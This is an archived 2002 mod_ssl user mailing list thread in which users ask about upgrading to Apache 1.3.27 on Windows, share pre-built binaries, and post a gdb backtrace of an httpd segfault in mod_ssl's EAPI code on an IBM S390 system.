User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 11 20:55:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA27976; Fri, 11 Oct 2002 20:54:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA27919; Fri, 11 Oct 2002 20:53:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F35794CE736; Fri, 11 Oct 2002 20:53:23 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2F6B5286B6; Fri, 11 Oct 2002 20:32:04 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fisher.vip.uk.com id OAA13018; Fri, 11 Oct 2002 14:02:44 +0200 (MET DST)
Received: from modem-110-10-60-62.vip.uk.com ([62.60.10.110] helo=c9e4h5)
	by fisher.vip.uk.com with smtp (Exim 3.35 #2)
	id 17zyV6-0001I8-00
	for modssl-users@modssl.org; Fri, 11 Oct 2002 13:02:40 +0100
Message-ID: <000701c2711d$ef3651e0$6e0a3c3e@c9e4h5>
From: "webmaster" 
To: 
References: 
Subject: Re: Win32 & Apache 1.3.27
Date: Fri, 11 Oct 2002 13:00:57 +0100
Organization: HF UK
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "webmaster" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Have you had a look at www.opensa.org for beginners.

Dave
----- Original Message ----- 
From: "Justin Annear" 
To: 
Sent: Friday, October 11, 2002 3:38 AM
Subject: Win32 & Apache 1.3.27


> Hi All,
> 
> Im a little new to the Apache & Mod_ssl scene and as such have used the
> 1.3.26 pre-compiled version on the modssl.org website.
> 
> I noticed recently that 1.3.27 (Apache) has been released and as such am
> wanting to upgrade asap to this version.
> 
> Im running Apache on a Windows 2000 server, due to reasons beyond my
> control and as such am hoping that I can obtain either one of two things
> 
> a) a pre-compiled version of apache 1.3.27 with modssl
> 
> or
> 
> b) instructions (clear and detailed due to my limited understanding of
> this topic) on how to upgrade apache and still keep my mod_ssl stuff
> intact. 
> I've upgraded my current mod_ssl to the latest versions etc.
> 
> I've looked into compiling a version myself as I dont believe this will
> be provided by modssl.org with limited success.
> 
> Thanks in advance
> 
> Justin Annear
> Ballarat Secondary College
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 11 21:24:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA29707; Fri, 11 Oct 2002 21:23:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA29701; Fri, 11 Oct 2002 21:23:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 73C8C4CE74A; Fri, 11 Oct 2002 21:23:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DADB02881A; Fri, 11 Oct 2002 21:16:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usilms54.ca.com id VAA28846; Fri, 11 Oct 2002 21:09:21 +0200 (MET DST)
Received: from usilms21.ca.com ([141.202.201.21]) by usilms54.ca.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 11 Oct 2002 15:09:13 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C27159.AF87214F"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390
Date: Fri, 11 Oct 2002 15:09:13 -0400
Message-ID: <8C6B052884783549B5D30C166853A5149E8048@usilms21.ca.com>
Thread-Topic: Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390
Thread-Index: AcJxWa636mBvM656TIK36YrQyfWvwQ==
From: "Bao, Xiliang" 
To: 
X-OriginalArrivalTime: 11 Oct 2002 19:09:13.0192 (UTC) FILETIME=[AF99DE80:01C27159]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bao, Xiliang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C27159.AF87214F
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi:

I was compiling apache with mod_ssl on S390. I picked apache 1.3.27, =
mod_ssl 2.8.11-1.3.27, openssl-0.9.6g.
First, I compiled openssl and installed in its default location =
/usr/local/ssl.
Second, I cd to mod_ssl directory and do a config:=20
./configure \
--with-apache=3D../apache_1.3.26_ssl \
--with-openssl=3D../openssl-0.9.6g \
--prefix=3D/usr/local/apache_ssl \
--with-layout=3DApache \
--enable-module=3Dmost \
--enable-shared=3Dmax \
--enable-rule=3DWANTHSREGEX

Third, I do "export SSL_BASE=3D/usr/local/ssl", then do a config:
./configure --prefix=3D/usr/local/apache_ssl \
		 --enable-module=3Dmost \
		 --enable-shared=3Dmax \
		 --enable-rule=3DWANTHSREGEX \
		 --enable-module=3Dssl
Then do a "make" followed by "make certificate"=20
Finally, do a "make install".

The same procedure works very well on Redhat Linux 7.3 on intel Pentium =
III.
But when I do it on IBM S390, the httpd crashed. Here are some debug =
information.
Any help will be great appreciated.

/usr/local/apache_ssl/bin # gdb httpd
GNU gdb 5.2.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you =
are
welcome to change it and/or distribute copies of it under certain =
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for =
details.
This GDB was configured as "s390-ibm-linux"...
(gdb) run -X -DSSL
Starting program: /usr/local/apache_ssl/bin/httpd -X -DSSL

Program received signal SIGSEGV, Segmentation fault.
0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125
125         for (i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)
(gdb) p ctx
$1 =3D (struct {...} *) 0x90bff02c
(gdb) up
#1  0x40299d70 in ssl_config_global_create () at ssl_engine_config.c:119
119         mc =3D ap_ctx_get(ap_global_ctx, "ssl_module");
(gdb) p ap_global_ctx
$2 =3D (struct {...} *) 0x4984e8
(gdb) p *ap_global_ctx
$3 =3D {cr_pool =3D 0x0, cr_entry =3D 0x4984f8}
(gdb) down
#0  0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125
125         for (i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)
(gdb) p *ctx
Cannot access memory at address 0x90bff02c
(gdb) where
#0  0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125
#1  0x40299d70 in ssl_config_global_create () at ssl_engine_config.c:119
#2  0x40299fde in ssl_config_server_create (p=3D0x48f118, s=3D0x48f140) =
at ssl_engine_config.c:193
#3  0x00413a34 in ap_single_module_configure (p=3D0x48f118, =
s=3D0x48f140, m=3D0x403660b0)
    at http_config.c:1691
#4  0x0040931e in load_module (cmd=3D0x7ffff608, dummy=3D0x0, =
modname=3D0x49cde8 "ssl_module",
    filename=3D0x49cdf8 "libexec/libssl.so") at mod_so.c:307
#5  0x0041161e in invoke_cmd (cmd=3D0x4764c8, parms=3D0x7ffff608, =
mconfig=3D0x0, args=3D0x7fffd5b7 "")
    at http_config.c:869
#6  0x004122ca in ap_handle_command (parms=3D0x7ffff608, =
config=3D0x48f670,
    l=3D0x7fffd588 "LoadModule ssl_module         libexec/libssl.so") at =
http_config.c:1080
#7  0x00412380 in ap_srm_command_loop (parms=3D0x7ffff608, =
config=3D0x48f670) at http_config.c:1094
#8  0x00412d64 in ap_process_resource_config (s=3D0x48f140,
    fname=3D0x490820 "/usr/local/apache_ssl/conf/httpd.conf", =
p=3D0x48f118, ptemp=3D0x493148)
    at http_config.c:1382
#9  0x0041396e in ap_read_config (p=3D0x48f118, ptemp=3D0x493148, =
confname=3D0x487a88 "conf/httpd.conf")
    at http_config.c:1674
#10 0x00422ef8 in main (argc=3D3, argv=3D0x7ffff8b4) at http_main.c:5531


    _/_/_/_/  _/   Steve Bao
   _/       _/_/   Computer Associates
  _/      _/  _/  =20
 _/     _/_/_/_/   Tel: (858) 625-6964
_/_/_/_/      _/   Fax: (858) 453-2816




------_=_NextPart_001_01C27159.AF87214F
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390





Hi:




I was compiling apache with mod_ssl on =
S390. I picked apache 1.3.27, mod_ssl 2.8.11-1.3.27, =
openssl-0.9.6g.


First, I compiled openssl and =
installed in its default location /usr/local/ssl.


Second, I cd to mod_ssl directory and =
do a config: 


./configure \


--with-apache=3D../apache_1.3.26_ssl =
\


--with-openssl=3D../openssl-0.9.6g =
\


--prefix=3D/usr/local/apache_ssl =
\


--with-layout=3DApache \


--enable-module=3Dmost \


--enable-shared=3Dmax \


--enable-rule=3DWANTHSREGEX




Third, I do "export =
SSL_BASE=3D/usr/local/ssl", then do a config:


./configure =
--prefix=3D/usr/local/apache_ssl \


        =
         --enable-module=3Dmost \


        =
         --enable-shared=3Dmax \


        =
         --enable-rule=3DWANTHSREGEX \


        =
         --enable-module=3Dssl


Then do a "make" followed by =
"make certificate" 


Finally, do a "make =
install".




The same procedure works very well on =
Redhat Linux 7.3 on intel Pentium III.


But when I do it on IBM S390, the =
httpd crashed. Here are some debug information.


Any help will be great =
appreciated.




/usr/local/apache_ssl/bin # gdb =
httpd


GNU gdb 5.2.1


Copyright 2002 Free Software =
Foundation, Inc.


GDB is free software, covered by the =
GNU General Public License, and you are


welcome to change it and/or distribute =
copies of it under certain conditions.


Type "show copying" to see =
the conditions.


There is absolutely no warranty for =
GDB.  Type "show warranty" for details.


This GDB was configured as =
"s390-ibm-linux"...


(gdb) run -X -DSSL


Starting program: =
/usr/local/apache_ssl/bin/httpd -X -DSSL




Program received signal SIGSEGV, =
Segmentation fault.


0x004457de in ap_ctx_get =
(ctx=3D0x90bff02c, key=3D0x4034b284 "ssl_module") at =
ap_ctx.c:125


125         for =
(i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)


(gdb) p ctx


$1 =3D (struct {...} *) =
0x90bff02c


(gdb) up


#1  0x40299d70 in =
ssl_config_global_create () at ssl_engine_config.c:119


119         mc =
=3D ap_ctx_get(ap_global_ctx, "ssl_module");


(gdb) p ap_global_ctx


$2 =3D (struct {...} *) =
0x4984e8


(gdb) p *ap_global_ctx


$3 =3D {cr_pool =3D 0x0, cr_entry =3D =
0x4984f8}


(gdb) down


#0  0x004457de in ap_ctx_get =
(ctx=3D0x90bff02c, key=3D0x4034b284 "ssl_module") at =
ap_ctx.c:125


125         for =
(i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)


(gdb) p *ctx


Cannot access memory at address =
0x90bff02c


(gdb) where


#0  0x004457de in ap_ctx_get =
(ctx=3D0x90bff02c, key=3D0x4034b284 "ssl_module") at =
ap_ctx.c:125


#1  0x40299d70 in =
ssl_config_global_create () at ssl_engine_config.c:119


#2  0x40299fde in =
ssl_config_server_create (p=3D0x48f118, s=3D0x48f140) at =
ssl_engine_config.c:193


#3  0x00413a34 in =
ap_single_module_configure (p=3D0x48f118, s=3D0x48f140, =
m=3D0x403660b0)


    at =
http_config.c:1691


#4  0x0040931e in load_module =
(cmd=3D0x7ffff608, dummy=3D0x0, modname=3D0x49cde8 =
"ssl_module",


    filename=3D0x49cdf8 =
"libexec/libssl.so") at mod_so.c:307


#5  0x0041161e in invoke_cmd =
(cmd=3D0x4764c8, parms=3D0x7ffff608, mconfig=3D0x0, args=3D0x7fffd5b7 =
"")


    at =
http_config.c:869


#6  0x004122ca in =
ap_handle_command (parms=3D0x7ffff608, config=3D0x48f670,


    l=3D0x7fffd588 =
"LoadModule =
ssl_module         =
libexec/libssl.so") at http_config.c:1080


#7  0x00412380 in =
ap_srm_command_loop (parms=3D0x7ffff608, config=3D0x48f670) at =
http_config.c:1094


#8  0x00412d64 in =
ap_process_resource_config (s=3D0x48f140,


    fname=3D0x490820 =
"/usr/local/apache_ssl/conf/httpd.conf", p=3D0x48f118, =
ptemp=3D0x493148)


    at =
http_config.c:1382


#9  0x0041396e in ap_read_config =
(p=3D0x48f118, ptemp=3D0x493148, confname=3D0x487a88 =
"conf/httpd.conf")


    at =
http_config.c:1674


#10 0x00422ef8 in main (argc=3D3, =
argv=3D0x7ffff8b4) at http_main.c:5531






    _/_/_/_/  _/   Steve Bao


   _/       =
_/_/   Computer Associates


  =
_/      _/  _/   


 _/     _/_/_/_/   Tel: (858) 625-6964


_/_/_/_/      _/   Fax: (858) 453-2816









------_=_NextPart_001_01C27159.AF87214F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 12 04:44:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA14060; Sat, 12 Oct 2002 04:43:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id EAA14056; Sat, 12 Oct 2002 04:42:31 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id <44WJFDZ8>; Fri, 11 Oct 2002 19:42:25 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: modssl-users@modssl.org
Subject: FW: DO NOT REPLY [Bug 13566]  -  Program (Dr.Watson) error on Apa
	che.exe on Win2K
Date: Fri, 11 Oct 2002 19:42:24 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can anyone confirm this - location of the problem (EAPI patch) AND solution
in version modssl 2.8.11???

I got this error on Apache 1.3.26 with modssl 2.8.10 and OpenSSL 0.9.6g on a
Win2k system.

----------------------------------------------------------------------------
-----
Ramakrishna Kuppa		| October 2002
Ph: 408 434 8339		| Ashwayuja Chitrabhanu 5104
http://www.intruvert.com

-----Original Message-----
From: bugzilla@apache.org [mailto:bugzilla@apache.org] 
Sent: Friday, October 11, 2002 7:35 PM
To: Ramakrishna Kuppa
Subject: DO NOT REPLY [Bug 13566] - Program (Dr.Watson) error on Apache.exe
on Win2K


DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG 
RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT
.
ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND 
INSERTED IN THE BUG DATABASE.

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=13566

Program (Dr.Watson) error on Apache.exe on Win2K

wrowe@apache.org changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |INVALID



------- Additional Comments From wrowe@apache.org  2002-10-12 02:35 -------

  All you needed to share was this segment...

function: ap_ctx_get
        6ff8f930 8b442404         mov     eax,[esp+0x4]          
ss:03cfb26f=????????
        6ff8f934 53               push    ebx
        6ff8f935 55               push    ebp
        6ff8f936 56               push    esi
        6ff8f937 57               push    edi
FAULT ->6ff8f938 8b7804           mov     edi,[eax+0x4]          

which identifies the EAPI patch as the source of the segv.  Suggest
(STRONGLY) that you update to 1.3.27 with the latest OpenSSL (g?) and mod
ssl, this is possibly exploit related.

But it sure has nothing to do with the Apache HTTP Server project.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 12 06:09:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA16245; Sat, 12 Oct 2002 06:08:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from toq5-srv.bellnexxia.net id GAA16021; Sat, 12 Oct 2002 06:07:27 +0200 (MET DST)
Received: from sympatico.ca ([64.231.125.186]) by tomts9-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021011033125.XXUL14901.tomts9-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 10 Oct 2002 23:31:25 -0400
Message-ID: <3DA6462D.6040606@sympatico.ca>
Date: Thu, 10 Oct 2002 23:31:57 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Win32 & Apache 1.3.27
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Justin Annear wrote:
> Hi All,
> 
> Im a little new to the Apache & Mod_ssl scene and as such have used the
> 1.3.26 pre-compiled version on the modssl.org website.
> 
> I noticed recently that 1.3.27 (Apache) has been released and as such am
> wanting to upgrade asap to this version.
> 
> Im running Apache on a Windows 2000 server, due to reasons beyond my
> control and as such am hoping that I can obtain either one of two things
> 
> a) a pre-compiled version of apache 1.3.27 with modssl
> 
> or
> 
> b) instructions (clear and detailed due to my limited understanding of
> this topic) on how to upgrade apache and still keep my mod_ssl stuff
> intact. 
> I've upgraded my current mod_ssl to the latest versions etc.
> 
> I've looked into compiling a version myself as I dont believe this will
> be provided by modssl.org with limited success.
> 
> Thanks in advance
> 
> Justin Annear
> Ballarat Secondary College
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Justin,

I built these binaries last week...

http://hunter.campbus.com/Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6g-Win32.zip
http://hunter.campbus.com/Openssl-0.9.6g-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip

If you have any problems contact me on the list, as
 or at my personal account: hunter@tor.ath.cx

There are other sources, some more comprhensive than mine.


Victor's installer has just about anything you could want ...
Apache, OpenSSL, TomCat, Ant, PHP, MySQL, etc

vmedina98@unitec.edu.ve

Server Installer
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/IKIRUX_WSP_Pro1Beta3_ENG.exe

Installation Guide:
ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Installation Guide.pdf

Release Notes:

ftp://route.unitec.edu.ve/VictorMedina/IkiruxProyect/Ikirux Server 
Release Notes.pdf


Another nice package is...

OpenSA web server :: Next Generation Web Serving
http://www.opensa.org/

If you really want to roll your own I have some instructions that I put 
together ... very messy but easy to follow.  Ask and I will send it to 
you I am not going to torture the list with it again.

OR let me know how you are making out...

Chris.

Legal Notice
------------

These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some 
parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES 
TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 12 08:14:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA18762; Sat, 12 Oct 2002 08:13:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA18744; Sat, 12 Oct 2002 08:13:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 20AC44CE745; Sat, 12 Oct 2002 08:13:00 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0FDB7286D6; Sat, 12 Oct 2002 08:11:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from usilms54.ca.com id VAA00160; Fri, 11 Oct 2002 21:31:33 +0200 (MET DST)
Received: from usilms21.ca.com ([141.202.201.21]) by usilms54.ca.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 11 Oct 2002 15:31:27 -0400
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2715C.CB232802"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390
Date: Fri, 11 Oct 2002 15:31:27 -0400
Message-ID: <8C6B052884783549B5D30C166853A5149E8122@usilms21.ca.com>
Thread-Topic: Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390
Thread-Index: AcJxWa636mBvM656TIK36YrQyfWvwQAAuVjg
From: "Bao, Xiliang" 
To: 
X-OriginalArrivalTime: 11 Oct 2002 19:31:27.0890 (UTC) FILETIME=[CB249F20:01C2715C]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Bao, Xiliang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2715C.CB232802
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I forgot to mention that on S390, I installed Linux SuSE SLES-7 Kernal =
2.4.7.
Steve

-----Original Message-----
From: Bao, Xiliang=20
Sent: Friday, October 11, 2002 12:09 PM
To: modssl-users@modssl.org
Subject: Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390



Hi:=20

I was compiling apache with mod_ssl on S390. I picked apache 1.3.27, =
mod_ssl 2.8.11-1.3.27, openssl-0.9.6g.=20
First, I compiled openssl and installed in its default location =
/usr/local/ssl.=20
Second, I cd to mod_ssl directory and do a config:=20
./configure \=20
--with-apache=3D../apache_1.3.26_ssl \=20
--with-openssl=3D../openssl-0.9.6g \=20
--prefix=3D/usr/local/apache_ssl \=20
--with-layout=3DApache \=20
--enable-module=3Dmost \=20
--enable-shared=3Dmax \=20
--enable-rule=3DWANTHSREGEX=20

Third, I do "export SSL_BASE=3D/usr/local/ssl", then do a config:=20
./configure --prefix=3D/usr/local/apache_ssl \=20
                 --enable-module=3Dmost \=20
                 --enable-shared=3Dmax \=20
                 --enable-rule=3DWANTHSREGEX \=20
                 --enable-module=3Dssl=20
Then do a "make" followed by "make certificate"=20
Finally, do a "make install".=20

The same procedure works very well on Redhat Linux 7.3 on intel Pentium =
III.=20
But when I do it on IBM S390, the httpd crashed. Here are some debug =
information.=20
Any help will be great appreciated.=20

/usr/local/apache_ssl/bin # gdb httpd=20
GNU gdb 5.2.1=20
Copyright 2002 Free Software Foundation, Inc.=20
GDB is free software, covered by the GNU General Public License, and you =
are=20
welcome to change it and/or distribute copies of it under certain =
conditions.=20
Type "show copying" to see the conditions.=20
There is absolutely no warranty for GDB.  Type "show warranty" for =
details.=20
This GDB was configured as "s390-ibm-linux"...=20
(gdb) run -X -DSSL=20
Starting program: /usr/local/apache_ssl/bin/httpd -X -DSSL=20

Program received signal SIGSEGV, Segmentation fault.=20
0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125=20
125         for (i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)=20
(gdb) p ctx=20
$1 =3D (struct {...} *) 0x90bff02c=20
(gdb) up=20
#1  0x40299d70 in ssl_config_global_create () at ssl_engine_config.c:119 =

119         mc =3D ap_ctx_get(ap_global_ctx, "ssl_module");=20
(gdb) p ap_global_ctx=20
$2 =3D (struct {...} *) 0x4984e8=20
(gdb) p *ap_global_ctx=20
$3 =3D {cr_pool =3D 0x0, cr_entry =3D 0x4984f8}=20
(gdb) down=20
#0  0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125=20
125         for (i =3D 0; ctx->cr_entry[i] !=3D NULL; i++)=20
(gdb) p *ctx=20
Cannot access memory at address 0x90bff02c=20
(gdb) where=20
#0  0x004457de in ap_ctx_get (ctx=3D0x90bff02c, key=3D0x4034b284 =
"ssl_module") at ap_ctx.c:125=20
#1  0x40299d70 in ssl_config_global_create () at ssl_engine_config.c:119 =

#2  0x40299fde in ssl_config_server_create (p=3D0x48f118, s=3D0x48f140) =
at ssl_engine_config.c:193=20
#3  0x00413a34 in ap_single_module_configure (p=3D0x48f118, =
s=3D0x48f140, m=3D0x403660b0)=20
    at http_config.c:1691=20
#4  0x0040931e in load_module (cmd=3D0x7ffff608, dummy=3D0x0, =
modname=3D0x49cde8 "ssl_module",=20
    filename=3D0x49cdf8 "libexec/libssl.so") at mod_so.c:307=20
#5  0x0041161e in invoke_cmd (cmd=3D0x4764c8, parms=3D0x7ffff608, =
mconfig=3D0x0, args=3D0x7fffd5b7 "")=20
    at http_config.c:869=20
#6  0x004122ca in ap_handle_command (parms=3D0x7ffff608, =
config=3D0x48f670,=20
    l=3D0x7fffd588 "LoadModule ssl_module         libexec/libssl.so") at =
http_config.c:1080=20
#7  0x00412380 in ap_srm_command_loop (parms=3D0x7ffff608, =
config=3D0x48f670) at http_config.c:1094=20
#8  0x00412d64 in ap_process_resource_config (s=3D0x48f140,=20
    fname=3D0x490820 "/usr/local/apache_ssl/conf/httpd.conf", =
p=3D0x48f118, ptemp=3D0x493148)=20
    at http_config.c:1382=20
#9  0x0041396e in ap_read_config (p=3D0x48f118, ptemp=3D0x493148, =
confname=3D0x487a88 "conf/httpd.conf")=20
    at http_config.c:1674=20
#10 0x00422ef8 in main (argc=3D3, argv=3D0x7ffff8b4) at http_main.c:5531 =



    _/_/_/_/  _/   Steve Bao=20
   _/       _/_/   Computer Associates=20
  _/      _/  _/  =20
 _/     _/_/_/_/   Tel: (858) 625-6964=20
_/_/_/_/      _/   Fax: (858) 453-2816=20




------_=_NextPart_001_01C2715C.CB232802
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable




Apache 1.3.26 and 1.3.27 with mod_ssl crashed on S390




I=20
forgot to mention that on S390, I installed Linux SuSE SLES-7 Kernal=20
2.4.7.


Steve



  
-----Original Message-----
From: Bao, Xiliang=20
  
Sent: Friday, October 11, 2002 12:09 PM
To:=20
  modssl-users@modssl.org
Subject: Apache 1.3.26 and 1.3.27 =
with=20
  mod_ssl crashed on S390


  
Hi: 

  
I was compiling apache with mod_ssl on =
S390. I=20
  picked apache 1.3.27, mod_ssl 2.8.11-1.3.27, openssl-0.9.6g. =

First, I compiled openssl and installed in its =
default=20
  location /usr/local/ssl. 
Second, I cd to=20
  mod_ssl directory and do a config: 
./configure \ 
--with-apache=3D../apache_1.3.26_ssl \ 
--with-openssl=3D../openssl-0.9.6g \ 
--prefix=3D/usr/local/apache_ssl \ 
--with-layout=3DApache \ 
--enable-module=3Dmost \ 
--enable-shared=3Dmax \ 
--enable-rule=3DWANTHSREGEX 

  
Third, I do "export =
SSL_BASE=3D/usr/local/ssl", then=20
  do a config: 
./configure=20
  --prefix=3D/usr/local/apache_ssl \=20
  
       =20
          =20
  --enable-module=3Dmost \ =

       =20
          =20
  --enable-shared=3Dmax \ =

       =20
          =20
  --enable-rule=3DWANTHSREGEX \=20
  
       =20
          =20
  --enable-module=3Dssl 
Then do a =
"make"=20
  followed by "make certificate" 
Finally, do=20
  a "make install". 

  
The same procedure works very well on =
Redhat Linux=20
  7.3 on intel Pentium III. 
But =
when I do it=20
